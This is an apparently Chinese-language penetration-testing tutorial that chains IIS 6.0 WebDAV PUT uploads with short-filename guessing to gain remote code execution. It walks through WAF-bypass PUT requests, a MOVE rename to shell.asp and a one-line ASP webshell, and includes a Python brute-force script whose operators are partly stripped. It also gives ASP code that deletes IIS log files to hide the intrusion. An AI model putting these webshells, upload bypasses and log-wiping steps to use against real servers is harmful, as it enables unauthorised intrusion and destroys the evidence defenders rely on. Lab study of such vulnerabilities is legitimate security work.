从攻击链视角拆解IIS 6.0组合漏洞实战PUT文件上传与短文件名猜解的艺术在渗透测试的实战场景中真正考验技术功底的往往不是单一漏洞的利用而是如何将多个中低危漏洞串联成完整的攻击链。本文将聚焦IIS 6.0这一经典中间件通过虚拟机靶场搭建、Burp Suite高级利用、自动化脚本开发三个维度还原攻击者如何将PUT文件上传与短文件名猜解这两个看似普通的漏洞组合成致命武器。1. 靶场环境构建精准复现漏洞场景1.1 虚拟机配置要点选择Windows Server 2003 R2 SP2作为实验平台绝非偶然——这个版本默认安装IIS 6.0且未集成后续安全补丁。在VMware Workstation中配置时需特别注意# 系统基础配置建议 内存分配≥1GB 磁盘模式IDE兼容避免SCSI驱动问题 网络适配器NAT模式便于主机访问安装完成后通过服务器管理器添加WebDAV扩展组件时必须勾选写入权限选项。常见配置错误包括仅启用WebDAV未开放写入权限虚拟目录未继承父目录权限未关闭URLScan等过滤工具1.2 IIS关键配置检查使用adsutil.vbs脚本验证配置状态cscript %SystemDrive%\inetpub\adminscripts\adsutil.vbs GET W3SVC/WebDAV cscript %SystemDrive%\inetpub\adminscripts\adsutil.vbs GET W3SVC/1/Root/Write正常配置应返回WebDAV : (STRING) 1 AccessWrite : (BOOLEAN) True2. Burp Suite高级利用从OPTIONS探测到PUT上传2.1 WebDAV功能指纹识别传统扫描器可能遗漏WebDAV状态检测手动验证更可靠发送OPTIONS请求探测可用方法OPTIONS / HTTP/1.1 Host: target.com有效响应包含HTTP/1.1 200 OK Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE DAV: 1,22.2 PUT请求的变形艺术直接PUT上传常被WAF拦截可通过以下方式绕过分块传输编码PUT /test.txt HTTP/1.1 Transfer-Encoding: chunked 7 content 0MOVE方法二次利用PUT /temp.txt HTTP/1.1 ... MOVE /temp.txt HTTP/1.1 Destination: /shell.asp实战提示上传ASP脚本时建议采用%Execute(request(cmd))%这类短小精悍的代码避免被内容过滤检测。3. 短文件名漏洞的工程化利用3.1 自动化猜解算法实现传统手工猜解效率低下可用Python实现自动化探测import requests charset abcdefghijklmnopqrstuvwxyz0123456789~!#$%^()-_{} base_url http://target.com for i in charset: for j in charset: test_path / i j ~1.* r requests.get(base_url test_path) if r.status_code 404: print(fFound potential file: {test_path})3.2 结果分析与路径重构猜解出短文件名后需结合以下技巧还原完整路径常见备份文件命名规律webapp~1.rar→webapp_backup_2023.rarconfig~1.bak→config.inc.bakIIS目录结构特征/scripts/默认有执行权限/uploadfiles/常见上传目录4. 攻击链组合从信息泄露到Getshell4.1 典型攻击流程图解[OPTIONS探测] → [PUT上传测试] → [短文件名猜解] → [定位上传目录] → [PUT上传WebShell] → [MOVE重命名] → [RCE实现]4.2 防御规避技巧日志清理通过PUT上传cmd.asp后立即执行% Set fs CreateObject(Scripting.FileSystemObject) fs.DeleteFile(C:\WINDOWS\system32\LogFiles\W3SVC1\ex Year(Date) Month(Date) Day(Date) .log) %时间戳混淆在Burp中设置随机延迟Intruder→Options→Request Engine在真实渗透测试项目中这种组合攻击的成功率取决于对中间件行为的深度理解。我曾在一个金融系统测试中通过先猜解出upload~1.tmp的短文件名再结合PUT漏洞上传ASPX马最终绕过了多层防护机制。